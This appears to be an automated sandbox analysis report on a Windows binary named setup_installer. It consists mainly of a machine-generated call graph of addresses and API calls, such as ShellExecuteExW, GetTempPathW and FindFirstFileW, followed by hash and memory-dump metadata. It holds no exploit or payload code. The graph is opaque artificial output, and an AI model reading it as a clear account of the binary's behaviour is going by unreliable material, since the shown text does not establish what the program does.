12456->12839 12457 4018a3 13023 403204 free 12457->13023 12463 4018ab 13024 403204 free 12463->13024 12464 401354 12472 401365 12464->12472 12903 40b77a MessageBoxW 12464->12903 12465 40136d 12469 4031dd 2 API calls 12465->12469 12466 401182 12468 401193 12466->12468 12872 40b77a MessageBoxW 12466->12872 12467 40119b 12873 403f77 12467->12873 12883 401c64 12468->12883 12485 401374 12469->12485 12477 404ace 21 API calls 12472->12477 12475 4018b3 13025 403204 free 12475->13025 12481 401867 12477->12481 12479 403f77 2 API calls 12482 4011bb 12479->12482 13017 403204 free 12481->13017 12486 403f77 2 API calls 12482->12486 12768 40930e 12485->12768 12506 4011ce 12486->12506 12488 40125e 12890 403204 free 12488->12890 12489 40186f 13018 403204 free 12489->13018 12494 401269 12891 403204 free 12494->12891 12495 401877 13019 403204 free 12495->13019 12496 40139b 12904 40b77a MessageBoxW 12496->12904 12497 4013ac 12500 403740 2 API calls 12497->12500 12503 4013b8 12500->12503 12502 401274 12892 403204 free 12502->12892 12505 40368d 2 API calls 12503->12505 12509 4013c3 12505->12509 12507 40120e 12506->12507 12510 4037d2 3 API calls 12506->12510 12511 4012aa 12507->12511 12515 401220 MessageBoxW 12507->12515 12508 40127f 12893 403204 free 12508->12893 12780 4024db 12509->12780 12510->12507 12514 403f77 2 API calls 12511->12514 12518 4012ba 12514->12518 12515->12511 12519 401230 12515->12519 12516 401287 12894 403204 free 12516->12894 12523 4037d2 3 API calls 12518->12523 12880 403204 free 12519->12880 12521 401462 12817 403204 free 12521->12817 12522 4013e6 12527 40144b 12522->12527 12537 401400 12522->12537 12905 405fad 12522->12905 12528 4012c3 12523->12528 12526 40128f 12895 403204 free 12526->12895 12938 403204 free 12527->12938 12897 403204 free 12528->12897 12529 40146a 12534 40368d 2 API calls 12529->12534 12530 40123b 12881 403204 free 12530->12881 12542 401476 12534->12542 12536 401297 12896 403204 free 12536->12896 12537->12527 12545 40142c 12537->12545 12908 
404319 12537->12908 12539 401454 12939 403204 free 12539->12939 12541 4012cb 12547 403f77 2 API calls 12541->12547 12818 404834 GetCurrentDirectoryW 12542->12818 12543 401243 12882 403204 free 12543->12882 12923 405e4f 12545->12923 12546 40145c 12562 404ace 21 API calls 12546->12562 12551 4012dd 12547->12551 12555 4037d2 3 API calls 12551->12555 12559 4012e6 12555->12559 12558 4037d2 3 API calls 12564 401424 12558->12564 12898 403204 free 12559->12898 12560 401490 12566 401494 12560->12566 12567 4014bb 12560->12567 12563 4017a7 12562->12563 13006 403204 free 12563->13006 12922 403204 free 12564->12922 12573 4018ca 6 API calls 12566->12573 12569 4014c4 12567->12569 12570 40161a 12567->12570 12575 403740 2 API calls 12569->12575 12576 401652 12570->12576 12581 40376e 3 API calls 12570->12581 12572 4012ee 12577 403f77 2 API calls 12572->12577 12578 40149f 12573->12578 12574 4017af 13007 403204 free 12574->13007 12597 4014d0 12575->12597 12579 403740 2 API calls 12576->12579 12582 401300 12577->12582 12940 403204 free 12578->12940 12584 40165e 12579->12584 12587 40162c 12581->12587 12588 4037d2 3 API calls 12582->12588 12969 4055bc 12584->12969 12585 4017b7 13008 403204 free 12585->13008 12586 401512 12592 403740 2 API calls 12586->12592 12960 405155 12587->12960 12593 401309 12588->12593 12599 40151e ShellExecuteExW 12592->12599 12899 403204 free 12593->12899 12596 4017c2 13009 403204 free 12596->13009 12597->12586 12603 40399c 4 API calls 12597->12603 12605 401604 12599->12605 12606 40155d 12599->12606 12600 401311 12900 403204 free 12600->12900 12601 4036b0 2 API calls 12610 401673 12601->12610 12603->12586 12611 4017cd 13010 403204 free 12611->13010 12615 40131c 12901 403204 free 12615->12901 12625 4017d8 13011 403204 free 12625->13011 12627 401324 12902 403204 free 12627->12902 12638 40132c 12644 401c64 free 12638->12644 12644->12450 12703 40103d exit _XcptFilter 12705 40102d 12704->12705 12705->12408 12705->12409 12707 4143ff 12706->12707 12708 41440e 
GetModuleHandleW GetProcAddress 12706->12708 12707->12708 12710 414438 GetSystemDirectoryW 12707->12710 12709 414429 12708->12709 12708->12710 12709->12710 12715 401047 12709->12715 12711 414453 12710->12711 12710->12715 12712 41445e lstrlenW 12711->12712 12711->12715 12714 414479 12712->12714 12713 4144ca lstrcatW LoadLibraryExW 12713->12714 12713->12715 12714->12713 12714->12714 12714->12715 12715->12413 12717 40108b 12716->12717 12721 40302a 12716->12721 12722 403204 free 12717->12722 12718 403075 12719 40376e 3 API calls 12718->12719 12719->12717 12720 401ef8 4 API calls 12720->12721 12721->12717 12721->12718 12721->12720 12722->12426 12724 404310 12723->12724 12725 4042fe 12723->12725 12724->12430 12725->12724 12726 40376e 3 API calls 12725->12726 12726->12724 12728 403abb 12727->12728 12729 403afb 12728->12729 12730 403adc memmove 12728->12730 12729->12432 12730->12729 12732 4031dd 2 API calls 12731->12732 12733 4010fe 12732->12733 12734 4019f5 12733->12734 12735 4019ff __EH_prolog 12734->12735 13026 4053b3 12735->13026 12737 401b63 12738 405298 ctype FindCloseChangeNotification 12737->12738 12739 40111a 12738->12739 12739->12440 12739->12441 12741 401b45 12742 405298 ctype FindCloseChangeNotification 12741->12742 12742->12739 12743 401a2e 12743->12737 12743->12741 12744 401b10 memmove 12743->12744 12745 401ab7 memcmp 12743->12745 12746 401af1 memcmp 12743->12746 13029 405410 12743->13029 13033 401b7e 12743->13033 12744->12741 12744->12743 12745->12741 12745->12743 12746->12743 12749 403709 12748->12749 12750 4034e7 2 API calls 12749->12750 12751 401147 12750->12751 12751->12447 12753 404a4a __EH_prolog 12752->12753 12754 404ace 21 API calls 12753->12754 12755 404a55 12754->12755 12756 40368d 2 API calls 12755->12756 12764 401350 12755->12764 12757 404a62 12756->12757 13055 4048d6 GetTempPathW 12757->13055 12764->12464 12764->12465 12767 404a72 13077 403204 free 12767->13077 12769 409318 __EH_prolog 12768->12769 13088 4094da 12769->13088 12772 4038d0 malloc 
_CxxThrowException free 12774 409327 12772->12774 12773 40368d malloc _CxxThrowException 12773->12774 12774->12772 12774->12773 12776 403204 free ctype 12774->12776 12779 401397 12774->12779 13093 40940e 12774->13093 13096 409178 12774->13096 13113 409493 12774->13113 13121 401cf9 12774->13121 12776->12774 12779->12496 12779->12497 12781 4024e5 __EH_prolog 12780->12781 13186 4029f9 12781->13186 12784 4037d2 3 API calls 12785 402519 12784->12785 12786 4037d2 3 API calls 12785->12786 12787 402527 12786->12787 12788 4031dd 2 API calls 12787->12788 12789 402531 12788->12789 12791 402544 12789->12791 13265 402bc1 12789->13265 12792 4025e6 12791->12792 12793 402566 12791->12793 13196 4026c1 12792->13196 12794 418a80 2 API calls 12793->12794 12796 402591 12794->12796 12798 4025a4 12796->12798 12799 402597 12796->12799 12797 4025f1 12800 4037d2 3 API calls 12797->12800 12803 40368d 2 API calls 12798->12803 12801 418a40 ctype 2 API calls 12799->12801 12802 4025ff 12800->12802 12804 40259f 12801->12804 12802->12804 12806 4037d2 3 API calls 12802->12806 12805 4025ac 12803->12805 13255 402b65 12804->13255 12807 405fad 6 API calls 12805->12807 12806->12804 12809 4025bd 12807->12809 13279 40264d 12809->13279 12812 4025d0 13290 403204 free 12812->13290 12814 4025d8 12815 418a40 ctype 2 API calls 12814->12815 12816 4025e4 12815->12816 12816->12797 12817->12529 12819 40376e 3 API calls 12818->12819 12820 401488 12819->12820 12821 404826 SetCurrentDirectoryW 12820->12821 12821->12560 12837->12703 12838->12443 12840 403c61 __EH_prolog 12839->12840 14401 404015 12840->14401 12842 40368d malloc _CxxThrowException 12870 403c71 12842->12870 12844 403dd7 14426 403204 free 12844->14426 12846 403ddf 14427 403204 free 12846->14427 12848 403de7 14428 403204 free 12848->14428 12850 40117e 12850->12466 12850->12467 12851 4033ad 2 API calls 12851->12870 12852 403df4 14429 403204 free 12852->14429 12854 404045 malloc _CxxThrowException free _CxxThrowException 12854->12870 12855 403dfc 14430 
403204 free 12855->14430 12857 401b7e malloc _CxxThrowException free memcpy _CxxThrowException 12857->12870 12858 403e19 14433 403204 free 12858->14433 12859 403e04 14431 403204 free 12859->14431 12863 403e0c 14432 403204 free 12863->14432 12864 403e21 14434 403204 free 12864->14434 12867 403e29 12868 401d5b ctype free 12867->12868 12868->12850 12869 403204 free ctype 12869->12870 12870->12842 12870->12844 12870->12850 12870->12851 12870->12852 12870->12854 12870->12857 12870->12858 12870->12869 12871 401d5b ctype free 12870->12871 14406 403e47 12870->14406 14416 403fb4 12870->14416 12871->12870 12872->12468 12874 403f8f 12873->12874 12875 403f93 12874->12875 12876 403f9c 12874->12876 12877 40368d 2 API calls 12875->12877 12878 403740 2 API calls 12876->12878 12879 4011ab 12877->12879 12878->12879 12879->12479 12880->12530 12881->12543 12882->12468 12884 401c6e __EH_prolog 12883->12884 12885 401c94 12884->12885 12887 401d3f ctype free 12884->12887 14443 403204 free 12885->14443 12887->12884 12888 401256 12889 403204 free 12888->12889 12889->12488 12890->12494 12891->12502 12892->12508 12893->12516 12894->12526 12895->12536 12896->12703 12897->12541 12898->12572 12899->12600 12900->12615 12901->12627 12902->12638 12903->12472 12904->12472 14444 405f4a LoadStringW 12905->14444 12909 404323 __EH_prolog 12908->12909 12910 40368d 2 API calls 12909->12910 12911 404338 12910->12911 14455 4043dc FormatMessageW 12911->14455 12913 404351 12915 403740 2 API calls 12913->12915 12916 4043c3 12915->12916 14460 403204 free 12916->14460 12918 4039d8 4 API calls 12920 4043ac 12918->12920 12919 40141b 12919->12558 12921 4039d8 4 API calls 12920->12921 12921->12913 12922->12545 14461 418d80 12923->14461 12925 405e59 LoadStringW 12926 405ea3 12925->12926 12927 405e93 12925->12927 12929 40368d 2 API calls 12926->12929 12928 4036b0 2 API calls 12927->12928 12930 401438 MessageBoxW 12928->12930 12931 405eab 12929->12931 12937 403204 free 12930->12937 12932 405ee5 5 API calls 12931->12932 
12933 405ec0 12932->12933 12934 403740 2 API calls 12933->12934 12935 405ecb 12934->12935 14462 403204 free 12935->14462 12937->12527 12938->12539 12939->12546 12940->12472 12961 40515f __EH_prolog 12960->12961 12962 40368d 2 API calls 12961->12962 12963 405176 12962->12963 12964 404daf 16 API calls 12963->12964 12970 4055c3 12969->12970 12971 401666 12969->12971 12970->12971 12972 401ef8 4 API calls 12970->12972 12971->12601 12972->12971 13006->12574 13007->12585 13008->12596 13009->12611 13010->12625 13017->12489 13018->12495 13019->12443 13020->12449 13021->12453 13022->12457 13023->12463 13024->12475 13025->12703 13037 405392 13026->13037 13032 40541d 13029->13032 13030 4053ee ReadFile 13030->13032 13031 405449 13031->12743 13032->13030 13032->13031 13034 401b89 13033->13034 13035 401b8e 13033->13035 13043 403398 13034->13043 13035->12743 13040 405375 13037->13040 13041 40525f 2 API calls 13040->13041 13042 40538f 13041->13042 13042->12743 13046 40331b 13043->13046 13047 403361 _CxxThrowException 13046->13047 13048 40332a 13046->13048 13048->13047 13049 403332 13048->13049 13050 4031dd 2 API calls 13049->13050 13051 40333c memcpy 13050->13051 13054 403204 free 13051->13054 13053 403352 13053->13035 13054->13053 13056 40376e 3 API calls 13055->13056 13057 404917 13056->13057 13057->12767 13058 403656 13057->13058 13059 40366c 13058->13059 13060 4035d6 2 API calls 13059->13060 13061 403685 13060->13061 13062 40492e GetCurrentThreadId GetTickCount GetCurrentProcessId 13061->13062 13066 404961 13062->13066 13063 40376e 3 API calls 13063->13066 13064 4039d8 4 API calls 13064->13066 13066->13063 13066->13064 13067 4049df SetLastError 13066->13067 13068 40499d 13066->13068 13071 405489 2 API calls 13066->13071 13074 404a29 13066->13074 13075 404a0a GetLastError 13066->13075 13078 4051ae 13066->13078 13086 40447d CreateDirectoryW 13066->13086 13067->13066 13068->13066 13070 4039d8 4 API calls 13068->13070 13072 401ef8 4 API calls 13068->13072 13073 4049b1 GetTickCount 
13070->13073 13071->13066 13072->13068 13073->13068 13076 403204 free 13074->13076 13075->13066 13076->12767 13077->12764 13079 4051b8 __EH_prolog 13078->13079 13080 40368d 2 API calls 13079->13080 13081 4051cf 13080->13081 13082 404daf 16 API calls 13081->13082 13083 4051dc 13082->13083 13087 403204 free 13083->13087 13085 4051e6 13085->13066 13086->13066 13087->13085 13089 409502 13088->13089 13091 4094e5 13088->13091 13089->12774 13091->13089 13127 401cc6 13091->13127 13133 403204 free 13091->13133 13094 40368d 2 API calls 13093->13094 13095 409424 13094->13095 13095->12774 13097 409182 __EH_prolog 13096->13097 13135 409279 13097->13135 13100 409279 5 API calls 13112 4091bb 13100->13112 13101 409251 13102 410da8 free 13101->13102 13103 40925c 13102->13103 13104 410da8 free 13103->13104 13106 409268 13104->13106 13105 40368d malloc _CxxThrowException 13105->13112 13106->12774 13107 4037d2 3 API calls 13107->13112 13108 4037d2 3 API calls 13110 409202 wcscmp 13108->13110 13110->13112 13111 403204 free ctype 13111->13112 13112->13101 13112->13105 13112->13107 13112->13108 13112->13111 13148 409432 13112->13148 13114 40949d __EH_prolog 13113->13114 13115 4031dd 2 API calls 13114->13115 13116 4094a8 13115->13116 13117 4094bf 13116->13117 13159 40950a 13116->13159 13119 4088fd 4 API calls 13117->13119 13120 4094cb 13119->13120 13120->12774 13122 401d03 __EH_prolog 13121->13122 13123 401d29 13122->13123 13172 401d3f 13122->13172 13177 403204 free 13123->13177 13126 401d30 13126->12774 13128 401cd0 __EH_prolog 13127->13128 13129 401cf9 ctype free 13128->13129 13130 401ce3 13129->13130 13134 403204 free 13130->13134 13132 401ceb 13132->13091 13133->13091 13134->13132 13136 409283 __EH_prolog 13135->13136 13137 4030d0 free 13136->13137 13138 409295 13137->13138 13139 40368d 2 API calls 13138->13139 13146 40929d 13139->13146 13140 4092f6 13158 403204 free 13140->13158 13142 4092e4 13142->13140 13145 403089 4 API calls 13142->13145 13143 4091b0 13143->13100 13144 401ef8 4 
API calls 13144->13146 13145->13140 13146->13140 13146->13142 13146->13144 13147 403089 4 API calls 13146->13147 13147->13146 13149 40943c __EH_prolog 13148->13149 13150 4031dd 2 API calls 13149->13150 13151 409448 13150->13151 13152 403740 2 API calls 13151->13152 13153 409472 13151->13153 13154 409462 13152->13154 13155 4088fd 4 API calls 13153->13155 13156 403740 2 API calls 13154->13156 13157 409483 13155->13157 13156->13153 13157->13112 13158->13143 13160 409514 __EH_prolog 13159->13160 13161 403740 2 API calls 13160->13161 13162 40953b 13161->13162 13165 40955d 13162->13165 13167 409567 __EH_prolog 13165->13167 13166 40954b 13166->13117 13168 4031dd 2 API calls 13167->13168 13171 4095a0 13167->13171 13168->13171 13169 4031dd 2 API calls 13169->13171 13170 403740 malloc _CxxThrowException 13170->13171 13171->13166 13171->13169 13171->13170 13178 401d5b 13172->13178 13175 401d54 13175->13122 13177->13126 13184 403204 free 13178->13184 13180 401d66 13185 403204 free 13180->13185 13182 401d47 13182->13175 13183 403204 free 13182->13183 13183->13175 13184->13180 13185->13182 13187 402a03 __EH_prolog 13186->13187 13188 40368d 2 API calls 13187->13188 13189 402a12 13188->13189 13190 40368d 2 API calls 13189->13190 13191 402a1e 13190->13191 13291 402a4c 13191->13291 13194 40368d 2 API calls 13195 402504 13194->13195 13195->12784 13197 4026cb __EH_prolog 13196->13197 13198 40368d 2 API calls 13197->13198 13199 4026e6 13198->13199 13200 404daf 16 API calls 13199->13200 13201 4026f9 13200->13201 13202 40271d 13201->13202 13203 4026fd 13201->13203 13303 4028c3 13202->13303 13204 4038d0 3 API calls 13203->13204 13205 40270e 13204->13205 13409 403204 free 13205->13409 13209 4028b3 13209->12797 13210 4037d2 3 API calls 13211 402764 13210->13211 13307 40afa7 13211->13307 13214 4027b6 13217 403740 2 API calls 13214->13217 13215 40278e 13216 4038d0 3 API calls 13215->13216 13218 40279f 13216->13218 13219 4027c2 13217->13219 13386 403204 free 13218->13386 13221 4055bc 4 API 
calls 13219->13221 13223 4027ce 13221->13223 13222 4027a7 13387 403204 free 13222->13387 13336 40448c 13223->13336 13227 40282a 13229 4036f3 2 API calls 13227->13229 13228 4027da 13388 40b7fd 13228->13388 13252 4027af 13403 402f4a 13252->13403 13256 402b6f __EH_prolog 13255->13256 14349 403204 free 13256->14349 13258 402b88 14350 402af8 13258->14350 13262 402baa 14363 403204 free 13262->14363 13264 4013e2 13264->12521 13264->12522 13266 402bcb __EH_prolog 13265->13266 13267 40368d 2 API calls 13266->13267 13268 402bf7 13267->13268 13269 40368d 2 API calls 13268->13269 13270 402c03 13269->13270 13271 40368d 2 API calls 13270->13271 13272 402c0f 13271->13272 13273 40368d 2 API calls 13272->13273 13274 402c1f 13273->13274 14374 402c56 13274->14374 13277 40368d 2 API calls 13278 402c3a 13277->13278 13278->12791 13280 4037d2 3 API calls 13279->13280 13281 402665 13280->13281 14392 4061f9 DialogBoxParamW 13281->14392 13283 402670 14393 418a70 WaitForSingleObject 13283->14393 13285 40267a 13286 4026ae 6 API calls 13285->13286 13287 402687 SetWindowTextW 13286->13287 14394 403204 free 13287->14394 13289 40269a ShowWindow 13289->12812 13290->12814 13292 402a56 __EH_prolog 13291->13292 13293 40368d 2 API calls 13292->13293 13294 402a8b 13293->13294 13297 402aa6 13294->13297 13298 402ab0 __EH_prolog 13297->13298 13299 40368d 2 API calls 13298->13299 13300 402add 13299->13300 13301 40368d 2 API calls 13300->13301 13302 402a2e 13301->13302 13302->13194 13304 4028d3 13303->13304 13305 40368d 2 API calls 13304->13305 13306 40273d 13305->13306 13306->13210 13308 40afb1 __EH_prolog 13307->13308 13309 4031dd 2 API calls 13308->13309 13310 40afcb 13309->13310 13311 40afdd 13310->13311 13478 40b121 13310->13478 13313 40368d 2 API calls 13311->13313 13314 40b00c 13313->13314 13315 40368d 2 API calls 13314->13315 13317 40b018 13315->13317 13316 40b049 13431 40a90a 13316->13431 13317->13316 13410 40488c 13317->13410 13323 40b076 13486 403204 free 13323->13486 13324 40b0ee 13489 403204 
free 13324->13489 13327 40b07e 13487 403204 free 13327->13487 13329 40b0f6 13490 403204 free 13329->13490 13330 403632 2 API calls 13335 40b09a 13330->13335 13332 402784 13332->13214 13332->13215 13333 403089 4 API calls 13333->13335 13335->13324 13335->13330 13335->13333 13488 403204 free 13335->13488 13337 404496 __EH_prolog 13336->13337 13338 404da0 GetFileAttributesW 13337->13338 13340 4044a1 13338->13340 13339 4027d6 13339->13227 13339->13228 13340->13339 13341 4036b0 2 API calls 13340->13341 13343 4044d7 13341->13343 13386->13222 13387->13252 13404 402f51 13403->13404 13405 402f63 13404->13405 14347 403204 free 13404->14347 14348 403204 free 13405->14348 13408 402f6a 13408->13205 13409->13209 13491 404821 13410->13491 13413 4048a6 13415 40376e 3 API calls 13413->13415 13414 40376e 3 API calls 13414->13413 13416 4048bf 13415->13416 13417 40b290 13416->13417 13418 40b29a __EH_prolog 13417->13418 13419 4037d2 3 API calls 13418->13419 13420 40b2af 13419->13420 13421 403632 2 API calls 13420->13421 13422 40b2bc 13421->13422 13423 404daf 16 API calls 13422->13423 13424 40b2cb 13423->13424 13554 403204 free 13424->13554 13426 40b2df 13427 40b2e4 _CxxThrowException 13426->13427 13428 40b2f9 13426->13428 13427->13428 13429 4030d0 free 13428->13429 13430 40b301 13429->13430 13430->13316 13432 40a914 __EH_prolog 13431->13432 13555 40a8e3 13432->13555 13434 40af06 malloc _CxxThrowException 13452 40a925 13434->13452 13435 4037d2 malloc _CxxThrowException free 13435->13452 13436 40ad22 13437 405def VariantClear 13436->13437 13449 40a933 13437->13449 13438 40aef9 13439 405def VariantClear 13438->13439 13439->13449 13441 40ace8 13442 40ad0e 13441->13442 13667 40a26d 13441->13667 13672 402f6e 13442->13672 13443 405def VariantClear 13443->13452 13446 402f6e free 13446->13452 13448 4037d2 3 API calls 13448->13442 13449->13323 13449->13335 13451 40ad31 13454 402f6e free 13451->13454 13452->13434 13452->13435 13452->13436 13452->13438 13452->13441 13452->13443 13452->13446 
13452->13449 13452->13451 13455 40ad7b 13452->13455 13457 4028c3 2 API calls 13452->13457 13459 40adc5 13452->13459 13460 40ae5c 13452->13460 13471 40b397 malloc _CxxThrowException free memcpy 13452->13471 13477 403204 free ctype 13452->13477 13559 40a53f 13452->13559 13593 409683 13452->13593 13610 409616 13452->13610 13614 40a2c8 13452->13614 13663 409863 13452->13663 13454->13449 13456 402f6e free 13455->13456 13456->13449 13457->13452 13461 40a26d 3 API calls 13459->13461 13686 403204 free 13460->13686 13462 40add7 13461->13462 13465 4037d2 3 API calls 13462->13465 13467 40ade6 13465->13467 13466 40ae64 13687 403204 free 13466->13687 13684 403204 free 13467->13684 13470 40ae6c 13473 402f6e free 13470->13473 13471->13452 13472 40adee 13685 403204 free 13472->13685 13473->13449 13475 40adf6 13476 402f6e free 13475->13476 13476->13449 13477->13452 13479 40b12b __EH_prolog 13478->13479 13480 40368d 2 API calls 13479->13480 13481 40b158 13480->13481 13482 40368d 2 API calls 13481->13482 13483 40b16e 13482->13483 13484 40368d 2 API calls 13483->13484 13485 40b17d 13484->13485 13485->13311 13486->13327 13487->13332 13488->13335 13489->13329 13490->13332 13492 405c84 13491->13492 13495 4058fb 13492->13495 13496 405905 __EH_prolog 13495->13496 13497 40376e 3 API calls 13496->13497 13498 405918 13497->13498 13499 405976 13498->13499 13503 405925 13498->13503 13500 40368d 2 API calls 13499->13500 13501 40597e 13500->13501 13504 405994 13501->13504 13505 405989 13501->13505 13502 404898 13502->13413 13502->13414 13503->13502 13506 4036b0 2 API calls 13503->13506 13544 405ab3 GetCurrentDirectoryW 13504->13544 13507 40376e 3 API calls 13505->13507 13509 40593e 13506->13509 13510 405992 13507->13510 13539 405b0b 13509->13539 13512 4059c2 13510->13512 13514 4055bc 4 API calls 13510->13514 13547 403204 free 13512->13547 13524 4059a8 13514->13524 13515 405969 13543 403204 free 13515->13543 13518 40399c 4 API calls 13518->13515 13519 40368d 2 API calls 13520 405a28 13519->13520 
13521 405a55 13520->13521 13522 405a3b 13520->13522 13523 40376e 3 API calls 13521->13523 13548 403950 13522->13548 13526 405a53 13523->13526 13524->13512 13524->13519 13528 405b0b memmove 13526->13528 13530 405a69 13528->13530 13529 403950 4 API calls 13529->13526 13531 405a7b 13530->13531 13532 405a6d 13530->13532 13534 4037d2 3 API calls 13531->13534 13552 403204 free 13532->13552 13541 405b1e 13539->13541 13540 40594a 13540->13515 13540->13518 13541->13540 13542 403c09 memmove 13541->13542 13542->13541 13543->13502 13545 40376e 3 API calls 13544->13545 13546 405af4 13545->13546 13546->13510 13547->13502 13549 403960 13548->13549 13550 40351f 4 API calls 13549->13550 13551 403973 13550->13551 13551->13529 13552->13512 13554->13426 13556 40a8ee 13555->13556 13557 40a908 13556->13557 13688 40b3e1 13556->13688 13557->13452 13560 40a549 __EH_prolog 13559->13560 13561 40a56b 13560->13561 13563 40a598 13560->13563 13562 4031dd 2 API calls 13561->13562 13564 40a572 13562->13564 13563->13564 13566 4031dd 2 API calls 13563->13566 13565 40a2c8 24 API calls 13564->13565 13571 40a63b 13565->13571 13567 40a5a8 13566->13567 13568 4037d2 3 API calls 13567->13568 13570 40a5e4 13568->13570 13569 40a608 13569->13452 13572 4053b3 2 API calls 13570->13572 13571->13569 13695 409111 13571->13695 13573 40a5f1 13572->13573 13573->13564 13574 40a5f5 GetLastError 13573->13574 13574->13569 13576 40a7b5 13704 403204 free 13576->13704 13578 403740 2 API calls 13587 40a6b6 13578->13587 13579 401ef8 4 API calls 13579->13587 13581 40399c 4 API calls 13581->13587 13582 403204 free ctype 13582->13587 13583 4037d2 malloc _CxxThrowException free 13583->13587 13584 4039d8 4 API calls 13584->13587 13585 4053b3 2 API calls 13585->13587 13586 40a891 16 API calls 13586->13587 13587->13576 13587->13578 13587->13579 13587->13581 13587->13582 13587->13583 13587->13584 13587->13585 13587->13586 13588 40a2c8 24 API calls 13587->13588 13589 40a7e5 13587->13589 13698 40a8b7 13587->13698 13588->13587 13705 
403204 free 13589->13705 13591 40a7ed 13706 403204 free 13591->13706 13594 40968d __EH_prolog 13593->13594 13608 4096e0 13594->13608 13711 40349a 13594->13711 13595 409739 13596 405def VariantClear 13595->13596 13599 409741 13596->13599 13597 409746 13598 40975e 13597->13598 13600 409752 13597->13600 13601 40978e 13597->13601 13598->13601 13602 40975c 13598->13602 13599->13452 13604 40387d 4 API calls 13600->13604 13603 405def VariantClear 13601->13603 13606 405def VariantClear 13602->13606 13603->13599 13604->13602 13607 409778 13606->13607 13607->13599 13718 4097ac 13607->13718 13608->13595 13608->13597 13608->13599 13611 40963f 13610->13611 13612 405def VariantClear 13611->13612 13613 40966c 13612->13613 13613->13452 13615 40a2d2 __EH_prolog 13614->13615 13738 409dad 13615->13738 13664 40986d __EH_prolog 13663->13664 13665 405def VariantClear 13664->13665 13666 4098f0 13665->13666 13666->13452 13668 4037d2 3 API calls 13667->13668 13669 40a2b5 13668->13669 13670 4037d2 3 API calls 13669->13670 13671 40a2c1 13670->13671 13671->13448 13673 402f78 __EH_prolog 13672->13673 13943 403204 free 13673->13943 13675 402f91 13944 403204 free 13675->13944 13677 402f99 13945 403204 free 13677->13945 13679 402fa1 13946 402b4e 13679->13946 13682 402b4e free 13683 402fb4 13682->13683 13683->13449 13684->13472 13685->13475 13686->13466 13687->13470 13689 40b3f2 13688->13689 13693 40b3ff 13688->13693 13690 402f6e free 13689->13690 13691 40b3f9 13690->13691 13694 403204 free 13691->13694 13693->13556 13694->13693 13707 403547 13695->13707 13699 40a8c5 13698->13699 13700 40a8cf 13698->13700 13701 40368d 2 API calls 13699->13701 13702 403740 2 API calls 13700->13702 13703 40a8cd 13701->13703 13702->13703 13703->13587 13704->13569 13705->13591 13706->13569 13708 40355b 13707->13708 13709 4034e7 2 API calls 13708->13709 13710 403565 13709->13710 13710->13587 13712 4034c1 13711->13712 13713 4034ac _CxxThrowException 13711->13713 13714 4031dd 2 API calls 13712->13714 13713->13712 13715 
4034cc 13714->13715 13734 403204 free 13715->13734 13717 4034d9 13717->13608 13719 4097b6 __EH_prolog 13718->13719 13735 409675 13719->13735 13722 4037d2 3 API calls 13723 4097f0 13722->13723 13724 40984c 13723->13724 13725 40981e 13723->13725 13728 409813 13723->13728 13727 409831 13724->13727 13724->13728 13726 401ef8 4 API calls 13725->13726 13729 405def VariantClear 13728->13729 13730 409839 13729->13730 13730->13599 13734->13717 13736 409616 VariantClear 13735->13736 13737 409680 13736->13737 13737->13722 13737->13730 13739 409db7 __EH_prolog 13738->13739 13740 40429a 2 API calls 13739->13740 13741 409e18 13740->13741 13742 40368d 2 API calls 13741->13742 13744 409e23 13742->13744 13743 409e45 13746 4031dd 2 API calls 13743->13746 13747 409e6f 13743->13747 13744->13743 13745 40376e 3 API calls 13744->13745 13745->13743 13746->13747 13748 409eb5 13747->13748 13758 409ed4 13747->13758 13749 4088fd 4 API calls 13748->13749 13750 409ebe 13749->13750 13769 409fc9 13750->13769 13771 409f7c 13750->13771 13778 406827 3 API calls 13750->13778 13752 409fb4 13752->13771 13781 406827 3 API calls 13752->13781 13753 40a175 13863 403204 free 13753->13863 13754 409144 CharUpperW 13754->13758 13756 40a17d 13758->13750 13758->13754 13762 4088fd 4 API calls 13758->13762 13825 40b406 13758->13825 13762->13758 13765 40a1bd 13866 403204 free 13765->13866 13768 40a1d6 13867 403204 free 13768->13867 13769->13765 13769->13771 13776 40a26d 3 API calls 13769->13776 13777 406827 3 API calls 13769->13777 13808 409d49 13769->13808 13811 40e520 13769->13811 13817 40ed82 13769->13817 13828 409970 13769->13828 13862 403204 free 13771->13862 13772 40a1de 13776->13769 13777->13769 13778->13752 13781->13769 13870 409d63 13808->13870 13812 40e52a __EH_prolog 13811->13812 13813 40ed82 11 API calls 13812->13813 13814 40e583 13813->13814 13815 40e58a 13814->13815 13880 410b21 13814->13880 13815->13769 13818 40ed94 13817->13818 13823 406827 3 API calls 13818->13823 13819 40eda8 13824 406827 3 API 
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040BD8A
                                          • Part of subcall function 0040F0A2: _CxxThrowException.MSVCRT(?,0041C760), ref: 0040F0EB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: ExceptionH_prologThrow
                                        • String ID:
                                        • API String ID: 461045715-3916222277
                                        • Opcode ID: c1b8519deddaafef617f9fc7011b9fc81cf2af7ee97f803bbd860e78a6795cb0
                                        • Instruction ID: 9dd891245016f0e6c4d5ed255e412f020d35e1d655fa0f2a31f40bb369a830a0
                                        • Opcode Fuzzy Hash: c1b8519deddaafef617f9fc7011b9fc81cf2af7ee97f803bbd860e78a6795cb0
                                        • Instruction Fuzzy Hash: 91827E31900259DFDB14DFA4C884BAEBBB0BF05314F2442AEE815BB2D2D778AD45CB59
                                        APIs
                                          • Part of subcall function 00404B27: FindClose.KERNELBASE(00000000,000000FF,00404B58), ref: 00404B32
                                        • FindFirstFileW.KERNELBASE(?,?), ref: 00404B66
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
